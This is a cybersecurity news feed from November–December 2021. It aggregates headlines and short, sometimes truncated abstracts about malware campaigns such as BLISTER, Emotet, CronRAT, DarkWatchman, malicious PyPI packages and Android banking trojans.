Cybersecurity researchers have disclosed details of an evasive malware campaign that makes use of valid code signing certificates to sneak past security defenses and stay under the radar with the goal of deploying Cobalt Strike and BitRAT payloads on compromised systems. The binary, a loader, has been dubbed "Blister" by researchers from Elastic Security, with the malware samples having negligible to zero detections on VirusTotal. As of writing, the infection vector used to stage the attack, as well as the ultimate objectives of the intrusion, remains unknown. A notable aspect of the attacks is that they leverage a valid code signing certificate issued by Sectigo . The malware has been observed signed with the certificate in question dating back to September 15, 2021. Elastic said it reached out to the company to ensure that the abused certificates are revoked. "Executables with valid code signing certificates are often scrutinized to a lesser degree than unsigThe Hacker News
December 24, 2021
Android banking trojan spreads via fake Google Play Store page Full Text
Abstract
An Android banking trojan targeting Itaú Unibanco, a large financial services provider in Brazil with 55 million customers globally, is using a fake Google Play store to spread to devices.BleepingComputer
December 24, 2021
Experts warn of a new stealthy loader tracked as BLISTER Full Text
Abstract
Security researchers spotted a campaign that is employing a new stealthy malware tracked as BLISTER that targets windows systems. Elastic Security researchers uncovered a malware campaign that leverages a new malware and a stealthy loader tracked...Security Affairs
December 23, 2021
Stealthy BLISTER malware slips in unnoticed on Windows systems Full Text
Abstract
Security researchers have uncovered a malicious campaign that relies on a valid code-signing certificate to disguise malicious code as legitimate executables.BleepingComputer
December 23, 2021
AvosLocker ransomware reboots in Safe Mode to bypass security tools Full Text
Abstract
Recent AvosLocker ransomware attacks are characterized by a focus on disabling endpoint security solutions that stand in the way of threat actors.BleepingComputer
December 22, 2021
Dridex malware trolls employees with fake job termination emails Full Text
Abstract
A new Dridex malware phishing campaign is using fake employee termination emails as a lure to open a malicious Excel document, which then trolls the victim with a season's greeting message.BleepingComputer
December 21, 2021
Dridex Malware Is Installed With the Help of Log4j Vulnerability Full Text
Abstract
Cryptolaemus, a cybersecurity research firm, has warned that the Log4j vulnerability is currently being used to infect Windows devices with the Dridex Trojan and Linux devices with Meterpreter.Heimdal Security
December 20, 2021
DarkWatchman RAT uses Windows Registry fileless storage mechanism Full Text
Abstract
DarkWatchman is a new lightweight javascript-based Remote Access Trojan (RAT) that uses novel methods for fileless persistence. Recently Prevailion experts detected a malicious javascript-based Remote Access Trojan (RAT) dubbed DarkWatchman that uses...Security Affairs
December 19, 2021
Over 500,000 Android Users Downloaded a New Joker Malware App from Play Store Full Text
Abstract
A malicious Android app with more than 500,000 downloads from the Google Play app store has been found hosting malware that stealthily exfiltrates users' contact lists to an attacker-controlled server and signs up users to unwanted paid premium subscriptions without their knowledge. The latest Joker malware was found in a messaging-focused app named Color Message ("com.guo.smscolor.amessage"), which has since been removed from the official app marketplace. In addition, it has been observed simulating clicks in order to generate revenue from malicious ads and connecting to servers located in Russia. Color Message "accesses users' contact list and exfiltrates it over the network [and] automatically subscribes to unwanted paid services," mobile security firm Pradeo noted . "To make it difficult to be removed, the application has the capability to hides it icon once installed." "We is [sic] committed to ensuring that the app is as usefulThe Hacker News
December 19, 2021
New stealthy DarkWatchman malware hides in the Windows Registry Full Text
Abstract
A new malware named 'DarkWatchman' has emerged in the cybercrime underground, and it's a lightweight and highly-capable JavaScript RAT (Remote Access Trojan) paired with a C# keylogger.BleepingComputer
December 17, 2021
New PseudoManuscrypt Malware Infected Over 35,000 Computers in 2021 Full Text
Abstract
Industrial and government organizations, including enterprises in the military-industrial complex and research laboratories, are the targets of a new malware botnet dubbed PseudoManyscrypt that has infected roughly 35,000 Windows computers this year alone. The name comes from its similarities to the Manuscrypt malware , which is part of the Lazarus APT group's attack toolset, Kaspersky researchers said, characterizing the operation as a "mass-scale spyware attack campaign." The Russian cybersecurity company said it first detected the series of intrusions in June 2021. At least 7.2% of all computers attacked by the malware are part of industrial control systems (ICS) used by organizations in engineering, building automation, energy, manufacturing, construction, utilities, and water management sectors that are located mainly in India, Vietnam, and Russia. Approximately a third (29.4%) of non-ICS computers are situated in Russia (10.1%), India (10%), and Brazil (9.The Hacker News
December 16, 2021
‘DarkWatchman’ RAT Shows Evolution in Fileless Malware Full Text
Abstract
The new tool manipulates Windows Registry in unique ways to evade security detections and is likely being used by ransomware groups for initial network access.Threatpost
December 16, 2021
Anubis Banking Trojan Resurfaces to Cripple Over 400 Financial Firms Full Text
Abstract
A new campaign by Anubis banking trojan is aimed at nearly 400 financial institutions. Hackers masqueraded the official account management app for Orange Telecom. The malware collects significant information of victims by intercepting SMS, screen monitoring, GPS data collection, keylogging, file e ... Read MoreCyware Alerts - Hacker News
December 16, 2021
New Fileless Malware Uses Windows Registry as Storage to Evade Detection Full Text
Abstract
A new JavaScript-based remote access Trojan (RAT) propagated via a social engineering campaign has been observed employing sneaky "fileless" techniques as part of its detection-evasion methods to elude discovery and analysis. Dubbed DarkWatchman by researchers from Prevailion's Adversarial Counterintelligence Team (PACT), the malware uses a resilient domain generation algorithm ( DGA ) to identify its command-and-control (C2) infrastructure and utilizes the Windows Registry for all of its storage operations, thereby enabling it to bypass antimalware engines. The RAT "utilizes novel methods for fileless persistence, on-system activity, and dynamic run-time capabilities like self-updating and recompilation," researchers Matt Stafford and Sherman Smith said , adding it "represents an evolution in fileless malware techniques, as it uses the registry for nearly all temporary and permanent storage and therefore never writes anything to disk, allowing it to oThe Hacker News
December 16, 2021
Owowa, a malicious IIS Server module used to steal Microsoft Exchange credentials Full Text
Abstract
Threat actors are using a malicious Internet Information Services (IIS) Server module, dubbed Owowa, to steal Microsoft Exchange credentials. Kaspersky researchers spotted malicious actors while deploying a previously undiscovered binary, an Internet...Security Affairs
December 15, 2021
Malicious Exchange Server Module Hoovers Up Outlook Credentials Full Text
Abstract
“Owowa” stealthily lurks on IIS servers, waiting to harvest successful logins when an Outlook Web Access (OWA) authentication request is made.Threatpost
December 15, 2021
Emotet starts dropping Cobalt Strike again for faster attacks Full Text
Abstract
Right in time for the holidays, the notorious Emotet malware is once again directly installing Cobalt Strike beacons for rapid cyberattacks.BleepingComputer
December 14, 2021
Owowa: the add-on that turns your OWA into a credential stealer and remote access panel Full Text
Abstract
Owowa is a C#-based .NET v4.0 assembly that is intended to be loaded as a module within an IIS web server that also exposes Exchange’s Outlook Web Access (OWA) to credential theft and remote access.Kaspersky Labs
December 14, 2021
TinyNuke banking malware targets French organizations Full Text
Abstract
The TinyNuke malware is back and now was used in attacks aimed at French users working in manufacturing, technology, construction, and business services. Proofpoint researchers uncovered a campaign exclusively targeting French entities and organizations...Security Affairs
December 14, 2021
Anubis Android malware returns to target 394 financial apps Full Text
Abstract
The Anubis Android banking malware is now targeting the customers of nearly 400 financial institutions in a new malware campaign.BleepingComputer
December 13, 2021
TinyNuke info-stealing malware is again attacking French users Full Text
Abstract
The info-stealing malware TinyNuke has re-emerged in a new campaign targeting French users with invoice-themed lures in emails sent to corporate addresses and individuals working in manufacturing, technology, construction, and business services.BleepingComputer
December 13, 2021
TinyNuke Banking Malware Resurges with Invoice-themed Malspam Aimed at French Entities Full Text
Abstract
The campaigns use invoice-themed lures to target hundreds of customers of organizations in various industries including manufacturing, technology, construction, and business services.Proof Point
December 13, 2021
Microsoft Details Building Blocks of Widely Active Qakbot Banking Trojan Full Text
Abstract
Infection chains associated with the multi-purpose Qakbot malware have been broken down into "distinct building blocks," an effort that Microsoft said will help to proactively detect and block the threat in an effective manner. The Microsoft 365 Defender Threat Intelligence Team dubbed Qakbot a "customizable chameleon that adapts to suit the needs of the multiple threat actor groups that utilize it." Qakbot is believed to be the creation of a financially motivated cybercriminal threat group known as Gold Lagoon . It is a prevalent information-stealing malware that, in recent years, has become a precursor to many critical and widespread ransomware attacks, offering a malware installation-as-a-service that enables many campaigns. First discovered in 2007, the modular malware — like TrickBot — has evolved from its early roots as a banking trojan to become a Swiss Army knife capable of data exfiltration and acting as a delivery mechanism for the second stThe Hacker News
December 13, 2021
Hancitor maldoc drops via Windows Clipboard Full Text
Abstract
Hancitor, a malware loader that provides Malware-as-a-Service, has been observed distributing malware such as FickerStealer, Pony, CobaltStrike, Cuba Ransomware, and many more.McAfee
December 13, 2021
Malicious PyPI packages with over 10,000 downloads taken down Full Text
Abstract
The Python Package Index (PyPI) registry has removed three malicious Python packages aimed at exfiltrating environment variables and dropping trojans on the infected machines. These malicious packages are estimated to have generated over 10,000 downloads and mirrors put together, according to the researchers' report.BleepingComputer
December 11, 2021
Microsoft: These are the building blocks of QBot malware attacks Full Text
Abstract
As QBot campaigns increase in size and frequency, researchers are looking into ways to break the trojan's distribution chain and tackle the threat.BleepingComputer
December 10, 2021
Decade-old Modular Banking Trojan Adds Capability of Delivering Ransomware Payloads Full Text
Abstract
Qakbot has in the past year started delivering ransomware and this new business model is making it harder for network defenders to detect what is and isn't a Qakbot attack.ZDNet
December 10, 2021
PHP Re-Infectors – The Malware that Keeps On Giving Full Text
Abstract
Attackers usually replace the index.php with an infected copy of the WordPress index.php file and also add hundreds or thousands of infected .htaccess files throughout the website directories.Sucuri
December 10, 2021
BlackCat ransomware, a very sophisticated malware written in Rust Full Text
Abstract
BlackCat is the first professional ransomware strain that was written in the Rust programming language, researchers reported. Malware researchers from Recorded Future and MalwareHunterTeam discovered ALPHV (aka BlackCat), the first professional...Security Affairs
December 09, 2021
Malicious Notepad++ installers push StrongPity malware Full Text
Abstract
The sophisticated hacking group known as StrongPity is circulating laced Notepad++ installers that infect targets with malware.BleepingComputer
December 9, 2021
Tens of malicious NPM packages caught hijacking Discord servers Full Text
Abstract
Researches from cybersecurity firm JFrog found 17 malicious packages on the NPM package repository hijacking Discord servers. JFrog researchers have discovered 17 malicious packages in the NPM (Node.js package manager) repository that were developed...Security Affairs
December 8, 2021
Emotet Needs No Intermediate Trojan, Drops Cobalt Strike Beacons Directly Full Text
Abstract
Conventionally, Emotet would install either TrickBot or Qbot on compromised devices. These trojans would eventually install Cobalt Strike. Now, it has changed its tactics.Cyware Alerts - Hacker News
December 8, 2021
Emotet directly drops Cobalt Strike beacons without intermediate Trojans Full Text
Abstract
The Emotet malware continues to evolve, in the latest attacks, it directly installs Cobalt Strike beacons to give the attackers access to the target network. Emotet malware now directly installs Cobalt Strike beacons to give the attackers immediate...Security Affairs
December 07, 2021
Emotet now drops Cobalt Strike, fast forwards ransomware attacks Full Text
Abstract
In a concerning development, the notorious Emotet malware now installs Cobalt Strike beacons directly, giving immediate network access to threat actors and making ransomware attacks imminent.BleepingComputer
December 7, 2021
How DopplePaymer Hunts & Kills Windows Processes Full Text
Abstract
DoppelPaymer hijacks ProcessHacker and exploits KProcessHacker to kill a list of processes, including both antivirus (AV) and endpoint detection and response (EDR) applications.Crowdstrike
December 6, 2021
Magnat malvertising campaigns spreads malicious Chrome extensions, backdoors and info stealers Full Text
Abstract
Experts spotted a series of malvertising campaigns using fake installers of popular apps and games to deliver a backdoor and a malicious Chrome extension. Talos researchers spotted a series of malvertising campaigns using fake installers of popular...Security Affairs
December 6, 2021
Emotet Spreads Again with Fake App Installers Full Text
Abstract
Threat actors behind Emotet are penetrating inside networks through malicious Windows App Installer packages by imitating Adobe PDF software. The campaign uses stolen reply-chain emails that seem to be a reply to an existing conversation. Once the install button is clicked, the installer downloads ... Read MoreCyware Alerts - Hacker News
December 05, 2021
Malicious Excel XLL add-ins push RedLine password-stealing malware Full Text
Abstract
Cybercriminals are spamming website contact forms and discussion forums to distribute Excel XLL files that download and install the RedLine password and information-stealing malware.BleepingComputer
December 04, 2021
Malicious KMSPico installers steal your cryptocurrency wallets Full Text
Abstract
Threat actors are distributing altered KMSpico installers to infect Windows devices with malware that steals cryptocurrency wallets.BleepingComputer
December 03, 2021
New Malvertising Campaigns Spreading Backdoors, Malicious Chrome Extensions Full Text
Abstract
A series of malicious campaigns have been leveraging fake installers of popular apps and games such as Viber, WeChat, NoxPlayer, and Battlefield as a lure to trick users into downloading a new backdoor and an undocumented malicious Google Chrome extension with the goal of stealing credentials and data stored in the compromised systems as well as maintaining persistent remote access. Cisco Talos attributed the malware payloads to an unknown actor that goes by the alias " magnat ," noting that "these two families have been subject to constant development and improvement by their authors." The attacks are believed to have commenced in late 2018, with intermittent activity observed towards the end of 2019 and through early 2020, followed by fresh spikes since April 2021, while mainly singling out users in Canada, followed by the U.S., Australia, Italy, Spain, and Norway. A noteworthy aspect of the intrusions is the use of malvertising as a means to strike individuaThe Hacker News
December 03, 2021
New Payment Data Stealing Malware Hides in Nginx Process on Linux Servers Full Text
Abstract
E-commerce platforms in the U.S., Germany, and France have come under attack from a new form of malware that targets Nginx servers in an attempt to masquerade its presence and slip past detection by security solutions. "This novel code injects itself into a host Nginx application and is nearly invisible," Sansec Threat Research team said in a new report. "The parasite is used to steal data from eCommerce servers, also known as 'server-side Magecart.'" A free and open-source software, Nginx is a web server that can also be used as a reverse proxy, load balancer, mail proxy, and HTTP cache. NginRAT, as the advanced malware is called, works by hijacking a host Nginx application to embed itself into the webserver process. The remote access trojan itself is delivered via CronRAT , another piece of malware the Dutch cybersecurity firm disclosed last week as hiding its malicious payloads in cron jobs scheduled to execute on February 31st, a non-existent caThe Hacker News
December 03, 2021
Fake support agents call victims to install Android banking malware Full Text
Abstract
The BRATA Android remote access trojan (RAT) has been spotted in Italy, with threat actors calling victims of SMS attacks to steal their online banking credentials.BleepingComputer
December 2, 2021
Bogus Android App Steals Banking Credentials from Malaysian Individuals Full Text
Abstract
Initially noticed by MalwareHunterTeam and later analyzed by security experts at Cyblis, this application is promoted via numerous bogus or copied websites and social media accounts in order to advertise the malicious APK ‘Cleaning Service Malaysia.’Heimdal Security
December 2, 2021
NginRAT – A stealth malware targets e-store hiding on Nginx servers Full Text
Abstract
Researchers from security firm Sansec recently discovered a new Linux remote access trojan (RAT), tracked as CronRAT, that hides in the Linux task scheduling system (cron) on February 31st.Security Affairs
December 02, 2021
Researches Detail 17 Malicious Frameworks Used to Attack Air-Gapped Networks Full Text
Abstract
Four different malicious frameworks designed to attack air-gapped networks were detected in the first half of 2020 alone, bringing the total number of such toolkits to 17 and offering adversaries a pathway to cyber espionage and exfiltrate classified information. "All frameworks are designed to perform some form of espionage, [and] all the frameworks used USB drives as the physical transmission medium to transfer data in and out of the targeted air-gapped networks," ESET researchers Alexis Dorais-Joncas and Facundo Muñoz said in a comprehensive study of the frameworks. Air-gapping is a network security measure designed to prevent unauthorized access to systems by physically isolating them from other unsecured networks, including local area networks and the public internet. This also implies that the only way to transfer data is by connecting a physical device to it, such as USB drives or external hard disks. Given that the mechanism is one of the most common ways SCADThe Hacker News
December 2, 2021
Emotet trojan returned after the takedown: detected in Japan Full Text
Abstract
Emotet trojan is an infection that spreads using phishing email campaigns with malicious attachments. Once the file gets dropped on the machine, malware can steal emails, credentials, run malware tile TrickBot or Qbot delivered previously.2-Spyware
December 2, 2021
NginRAT – A stealth malware targets e-store hiding on Nginx servers Full Text
Abstract
Threat actors are targeting e-stores with remote access malware, dubbed NginRAT, that hides on Nginx servers bypassing security solutions. Researchers from security firm Sansec recently discovered a new Linux remote access trojan (RAT), tracked as CronRAT,...Security Affairs
December 2, 2021
Magnat campaigns use malvertising to deliver information stealer, backdoor and malicious Chrome extension Full Text
Abstract
This campaign includes a set of malware distribution campaigns that started in late 2018 and have targeted mainly Canada, along with the U.S., Australia and some EU countries.Cisco Talos
December 02, 2021
New malware hides as legit nginx process on e-commerce servers Full Text
Abstract
eCommerce servers are being targeted with remote access malware that hides on Nginx servers in a way that makes it virtually invisible to security solutions.BleepingComputer
December 01, 2021
Emotet now spreads via fake Adobe Windows App Installer packages Full Text
Abstract
The notorious Emotet malware is now distributed through malicious Windows App Installer packages that pretend to be Adobe PDF software.BleepingComputer
December 01, 2021
Malicious Android app steals Malaysian bank credentials, MFA codes Full Text
Abstract
A fake Android app is masquerading as a housekeeping service to steal online banking credentials from the customers of eight Malaysian banks.BleepingComputer
November 30, 2021
Finland warns of Flubot malware heavily targeting Android users Full Text
Abstract
Finland's National Cyber Security Centre (NCSC-FI) has issued a "severe alert" to warn of a massive campaign targeting the country's Android users with Flubot banking malware pushed via text messages sent from compromised devices.BleepingComputer
November 30, 2021
4 Android banking trojans were spread via Google Play infecting 300.000+ devices Full Text
Abstract
Experts found four Android banking trojans that were available on the official Google Play Store and that infected +300,000 devices. Researchers from ThreatFabric discovered four distinct Android banking trojans that were spread via the official...Security Affairs
November 30, 2021
Android banking malware infects 300,000 Google Play users Full Text
Abstract
Malware campaigns distributing Android trojans that steals online bank credentials have infected almost 300,000 devices through malicious apps pushed via Google's Play Store.BleepingComputer
November 29, 2021
4 Android Banking Trojan Campaigns Targeted Over 300,000 Devices in 2021 Full Text
Abstract
Four different Android banking trojans were spread via the official Google Play Store between August and November 2021, resulting in more than 300,000 infections through various dropper apps that posed as seemingly harmless utility apps to take full control of the infected devices. Designed to deliver Anatsa (aka TeaBot), Alien, ERMAC, and Hydra, cybersecurity firm ThreatFabric said the malware campaigns are not only more refined, but also engineered to have a small malicious footprint, effectively ensuring that the payloads are installed only on smartphones devices from specific regions and preventing the malware from being downloaded during the publishing process. The list of malicious dropper apps is below - Two Factor Authenticator (com.flowdivison) Protection Guard (com.protectionguard.app) QR CreatorScanner (com.ready.qrscanner.mix) Master Scanner Live (com.multifuction.combine.qr) QR Scanner 2021 (com.qr.code.generate) QR Scanner (com.qr.barqr.scangen) PDF DocumentThe Hacker News
November 28, 2021
RATDispenser, a new stealthy JavaScript loader used to distribute RATs Full Text
Abstract
RATDispenser is a new stealthy JavaScript loader that is being used to spread multiple remote access trojans (RATs) into the wild. Researchers from the HP Threat Research team have discovered a new stealthy JavaScript loader dubbed RATDispenser that...Security Affairs
November 27, 2021
CronRAT Abuses Linux Task Scheduler to Stay Under the Radar Full Text
Abstract
Security researchers have discovered a Linux-based remote access trojan (RAT) that uses an unusual stealth technique to steal data. It hides in the Linux calendar sub-system as a task that has a nonexistent date viz. February 31. Organizations are suggested to invest more in data protection solutio ... Read MoreCyware Alerts - Hacker News
November 26, 2021
CronRAT: A New Linux Malware That’s Scheduled to Run on February 31st Full Text
Abstract
Researchers have unearthed a new remote access trojan (RAT) for Linux that employs a never-before-seen stealth technique that involves masking its malicious actions by scheduling them for execution on February 31st, a non-existent calendar day. Dubbed CronRAT, the sneaky malware "enables server-side Magecart data theft which bypasses browser-based security solutions," Sansec Threat Research said. The Dutch cybersecurity firm said it found samples of the RAT on several online stores, including an unnamed country's largest outlet. CronRAT's standout feature is its ability to leverage the cron job-scheduler utility for Unix to hide malicious payloads using task names programmed to execute on February 31st. Not only does this allow the malware to evade detection from security software, but it also enables it to launch an array of attack commands that could put Linux eCommerce servers at risk. "The CronRAT adds a number of tasks to crontab with a curious dateThe Hacker News
November 25, 2021
New Linux CronRAT hides in cron jobs to evade detection in Magecart attacks Full Text
Abstract
Security researchers discovered a new Linux RAT, tracked as CronRAT, that hides in scheduled cron jobs to avoid detection. Security researchers from Sansec have discovered a new Linux remote access trojan (RAT), tracked as CronRAT, that hides in the Linux...Security Affairs
November 25, 2021
This New Stealthy JavaScript Loader Infecting Computers with Malware Full Text
Abstract
Threat actors have been found using a previously undocumented JavaScript malware strain that functions as a loader to distribute an array of remote access Trojans (RATs) and information stealers. HP Threat Research dubbed the new, evasive loader "RATDispenser," with the malware responsible for deploying at least eight different malware families in 2021. Around 155 samples of this new malware have been discovered, spread across three different variants, hinting that it's under active development. "RATDispenser is used to gain an initial foothold on a system before launching secondary malware that establishes control over the compromised device," security researcher Patrick Schläpfer said . "All the payloads were RATs, designed to steal information and give attackers control over victim devices." As with other attacks of this kind, the starting point of the infection is a phishing email containing a malicious attachment, which masquerades as a textThe Hacker News
November 25, 2021
New Linux malware hides in cron jobs with invalid dates Full Text
Abstract
Security researchers have discovered a new remote access trojan (RAT) for Linux that keeps an almost invisible profile by hiding in tasks scheduled for execution on a non-existent day, February 31st.BleepingComputer
November 25, 2021
Emotet’s Infrastructure Witnesses Huge Growth Full Text
Abstract
Upon analyzing Emotet’s code, several researchers confirmed that the malware has been upgraded, along with expansion of its infrastructure, for an improved, secure, and robust operation.Cyware Alerts - Hacker News
November 25, 2021
Discord malware campaign targets crypto and NFT communities Full Text
Abstract
A new malware campaign on Discord uses the Babadeda crypter to hide malware that targets the crypto, NFT, and DeFi communities.BleepingComputer
November 24, 2021
9.3M+ Androids Running ‘Malicious’ Games from Huawei AppGallery Full Text
Abstract
A new trojan called Android.Cynos.7.origin, designed to collect Android users’ device data and phone numbers, was found in 190 games installed on over 9M Android devices.Threatpost
November 24, 2021
Stealthy new JavaScript malware infects Windows PCs with RATs Full Text
Abstract
A new stealthy JavaScript malware loader named RATDispenser is being used to infect devices with a variety of remote access trojans (RATs) in phishing attacks.BleepingComputer
November 23, 2021
Over 9 Million Android Phones Running Malware Apps from Huawei’s AppGallery Full Text
Abstract
At least 9.3 million Android devices have been infected by a new class of malware that disguises itself as dozens of arcade, shooter, and strategy games on Huawei's AppGallery marketplace to steal device information and victims' mobile phone numbers. The mobile campaign was disclosed by researchers from Doctor Web, who classified the trojan as " Android.Cynos.7.origin ," owing to the fact that the malware is a modified version of the Cynos malware. Of the total 190 rogue games identified, some were designed to target Russian-speaking users, while others were aimed at Chinese or international audiences. Once installed, the apps prompted the victims for permission to make and manage phone calls, using the access to harvest their phone numbers along with other device information such as geolocation, mobile network parameters, and system metadata. "At first glance, a mobile phone number leak may seem like an insignificant problem. Yet in reality, it can serioThe Hacker News
November 23, 2021
BazarLoader Adds Compromised Installers, ISO Files to Arrival and Delivery Vectors Full Text
Abstract
Apart from compromised installers, the attackers use an ISO file with a Windows link (LNK) and dynamic link library (DLL) payload. The Americas were found to be the most targeted region.Trend Micro
November 23, 2021
Malware are already attempting to exploit new Windows Installer zero-day Full Text
Abstract
Vxers are already attempting to use the proof-of-concept exploit code targeting a new Microsoft Windows Installer zero-day publicly disclosed on Sunday. Malware authors are already attempting to use the proof-of-concept exploit code targeting a new Microsoft...Security Affairs
November 23, 2021
Malware now trying to exploit new Windows Installer zero-day Full Text
Abstract
Malware creators have already started testing a proof-of-concept exploit targeting a new Microsoft Windows Installer zero-day publicly disclosed by security researcher Abdelhamid Naceri over the weekend.BleepingComputer
November 23, 2021
Python Packages Stealing Discord Tokens and More Full Text
Abstract
Package managers are now becoming a common target for cybercriminals to exploit to their advantage. Researchers have discovered 11 malicious Python packages in the PyPI repository sealing Discord access tokens, passwords, and even carry out dependency confusion attacks. Altogether, they were down ... Read MoreCyware Alerts - Hacker News
November 23, 2021
Android.Cynos.7.origin trojan infected +9 million Android devices Full Text
Abstract
Researchers spotted dozens of games on Huawei's AppGallery catalog containing the Android.Cynos.7.origin trojan. Researchers from Dr. Web AV discovered 190 games on Huawei's AppGallery catalog (i.e. simulators, platformers, arcades, strategies,...Security Affairs
November 23, 2021
More Stealthier Version of BrazKing Android Malware Spotted in the Wild Full Text
Abstract
Banking apps from Brazil are being targeted by a more elusive and stealthier version of an Android remote access trojan (RAT) that's capable of carrying out financial fraud attacks by stealing two-factor authentication (2FA) codes and initiating rogue transactions from infected devices to transfer money from victims' accounts to an account operated by the threat actor. IBM X-Force dubbed the revamped banking malware BrazKing , a previous version of which was referred to as PixStealer by Check Point Research. The mobile RAT was first seen around November 2018, according to ThreatFabric. "It turns out that its developers have been working on making the malware more agile than before, moving its core overlay mechanism to pull fake overlay screens from the command-and-control (C2) server in real-time," IBM X-Force researcher Shahar Tavor noted in a technical deep dive published last week. "The malware […] allows the attacker to log keystrokes, extract the paThe Hacker News
November 23, 2021
RATDispenser: Stealthy JavaScript Loader Dispensing RATs into the Wild Full Text
Abstract
RATDispenser is predominantly being used as a dropper (in 94% of samples analyzed by HP), meaning the malware doesn’t communicate over the network to deliver a malicious payload.HP Wolf Security
November 23, 2021
Over nine million Android devices infected by info-stealing trojan Full Text
Abstract
A large-scale malware campaign on Huawei's AppGallery has led to approximately 9,300,000 installs of Android trojans masquerading as over 190 different appsBleepingComputer
November 22, 2021
New Golang-based Linux Malware Targeting eCommerce Websites Full Text
Abstract
Weaknesses in e-commerce portals are being exploited to deploy a Linux backdoor as well as a credit card skimmer that's capable of stealing payment information from compromised websites. "The attacker started with automated e-commerce attack probes, testing for dozens of weaknesses in common online store platforms," researchers from Sansec Threat Research said in an analysis. "After a day and a half, the attacker found a file upload vulnerability in one of the store's plugins." The name of the affected vendor was not revealed. The initial foothold was then leveraged to upload a malicious web shell and alter the server code to siphon customer data. Additionally, the attacker delivered a Golang-based malware called " linux_avp " that serves as a backdoor to execute commands remotely sent from a command-and-control server hosted in Beijing. Upon execution, the program is designed to remove itself from the disk and camouflage as a " ps -efThe Hacker News
November 22, 2021
New Memento ransomware uses password-protected WinRAR archives to block access to the files Full Text
Abstract
Memento ransomware group locks files inside WinRAR password-protected archives after having observed that its encryption process is blocked by security firms. In October, Sophos researchers have spotted the Memento ransomware that adopts a curious...Security Affairs
November 21, 2021
Experts found 11 malicious Python packages in the PyPI repository Full Text
Abstract
Researchers discovered 11 malicious Python packages in the PyPI repository that can steal Discord access tokens, passwords, and conduct attacks. JFrog researchers have discovered 11 malicious Python packages in the Python Package Index (PyPI) repository...Security Affairs
November 19, 2021
11 Malicious PyPI Python Libraries Caught Stealing Discord Tokens and Installing Shells Full Text
Abstract
Cybersecurity researchers have uncovered as many as 11 malicious Python packages that have been cumulatively downloaded more than 41,000 times from the Python Package Index (PyPI) repository, and could be exploited to steal Discord access tokens, passwords, and even stage dependency confusion attacks. The Python packages have since been removed from the repository following responsible disclosure by DevOps firm JFrog — importantpackage / important-package pptest ipboards owlmoon DiscordSafety trrfab 10Cent10 / 10Cent11 yandex-yt yiffparty Two of the packages ("importantpackage," "10Cent10," and their variants) were found obtaining a reverse shell on the compromised machine, giving the attacker full control over an infected machine. Two other packages "ipboards" and "trrfab" masqueraded as legitimate dependencies designed to be automatically imported by taking advantage of a technique called dependency confusion or namespace confusThe Hacker News
November 19, 2021
Android banking Trojan BrazKing is back with significant evasion improvements Full Text
Abstract
The BrazKing Android banking trojan is back with significant improvements and dynamic banking overlays to avoid detection. Researchers from IBM spotted a new version of the BrazKing Android banking trojan that pull fake overlay screens from the command...Security Affairs
November 18, 2021
Android malware BrazKing returns as a stealthier banking trojan Full Text
Abstract
The BrazKing Android banking trojan has returned with dynamic banking overlays and a new implementation trick that enables it to operate without requesting risky permissions.BleepingComputer
November 18, 2021
Hackers deploy Linux malware, web skimmer on e-commerce servers Full Text
Abstract
Security researchers discovered that attackers are also deploying a Linux backdoor on compromised e-commerce servers after injecting a credit card skimmer into online shops' websites.BleepingComputer
November 16, 2021
Here are the new Emotet spam campaigns hitting mailboxes worldwide Full Text
Abstract
The Emotet malware kicked into action yesterday after a ten-month hiatus with multiple spam campaigns delivering malicious documents to mailboxes worldwide.BleepingComputer
November 16, 2021
New Blacksmith Exploit Bypasses Current Rowhammer Attack Defenses Full Text
Abstract
Cybersecurity researchers have demonstrated yet another variation of the Rowhammer attack affecting all DRAM (dynamic random-access memory) chips that bypasses currently deployed mitigations, thereby effectively compromising the security of the devices. The new technique — dubbed " Blacksmith " ( CVE-2021-42114 , CVSS score: 9.0) — is designed to trigger bit flips on target refresh rate-enabled DRAM chips with the help of novel "non-uniform and frequency-based" memory access patterns, according to a study jointly published by academics from ETH Zurich, Vrije Universiteit Amsterdam, and Qualcomm Technologies. Originally disclosed in 2014, Rowhammer refers to a fundamental hardware vulnerability that could be abused to alter or corrupt memory contents by taking advantage of DRAM's tightly-packed, matrix-like memory cell architecture to repeatedly access certain rows (aka "aggressors") that induces an electrical disturbance large enough to cause tThe Hacker News
November 16, 2021
Rooting Malware Is Back for Mobile. Here’s What to Look Out For. Full Text
Abstract
Hank Schless, senior manager of security solutions at Lookout, discusses AbstractEmu, mobile malware found on Google Play, Amazon Appstore and the Samsung Galaxy Store.Threatpost
November 16, 2021
SharkBot, a new Android Trojan targets banks in Europe Full Text
Abstract
Security researchers from Cleafy discovered a new Android banking trojan, named SharkBot, that is targeting banks in Europe. At the end of October, researchers from cyber security firms Cleafy and ThreatFabric have discovered a new Android banking...Security Affairs
November 15, 2021
SharkBot — A New Android Trojan Stealing Banking and Cryptocurrency Accounts Full Text
Abstract
Cybersecurity researchers on Monday took the wraps off a new Android trojan that takes advantage of accessibility features on the devices to siphon credentials from banking and cryptocurrency services in Italy, the U.K., and the U.S. Dubbed " SharkBot " by Cleafy, the malware is designed to strike a total of 27 targets — counting 22 unnamed international banks in Italy and the U.K. as well as five cryptocurrency apps in the U.S. — at least since late October 2021 and is believed to be in its early stages of development, with no overlaps found to that of any known families. "The main goal of SharkBot is to initiate money transfers from the compromised devices via Automatic Transfer Systems (ATS) technique bypassing multi-factor authentication mechanisms (e.g., SCA)," the researchers said in a report. "Once SharkBot is successfully installed in the victim's device, attackers can obtain sensitive banking information through the abuse of Accessibility ServThe Hacker News
November 15, 2021
Operation Reacharound – Emotet malware is back Full Text
Abstract
The Emotet botnet is still active, ten months after an international operation coordinated by Europol shut down its infrastructure. Early this year, law enforcement and judicial authorities worldwide conducted a joint operation, named Operation Ladybird,...Security Affairs
November 15, 2021
QAKBOT Trojan returns using Squirrelwaffle as a dropper Full Text
Abstract
Experts warn of a surge in infections of the QBot (aka Quakbot) banking trojan which seems to be associated with the rise of Squirrelwaffle. Researchers warn of a new wave of QBot (aka Qakbot) banking trojan infections that appears to be associated...Security Affairs
November 12, 2021
QAKBOT Loader Returns With New Techniques and Tools Full Text
Abstract
QAKBOT is a prevalent information-stealing malware that was first discovered in 2007. In recent years, its detection has become a precursor to many critical and widespread ransomware attacks.Trend Micro
November 12, 2021
QBot returns for a new wave of infections using Squirrelwaffle Full Text
Abstract
The activity of the QBot (also known as Quakbot) banking trojan is spiking again, and analysts from multiple security research firms attribute this to the rise of Squirrelwaffle.BleepingComputer
November 12, 2021
Malware uses namesilo Parking pages and Google’s custom pages to spread Full Text
Abstract
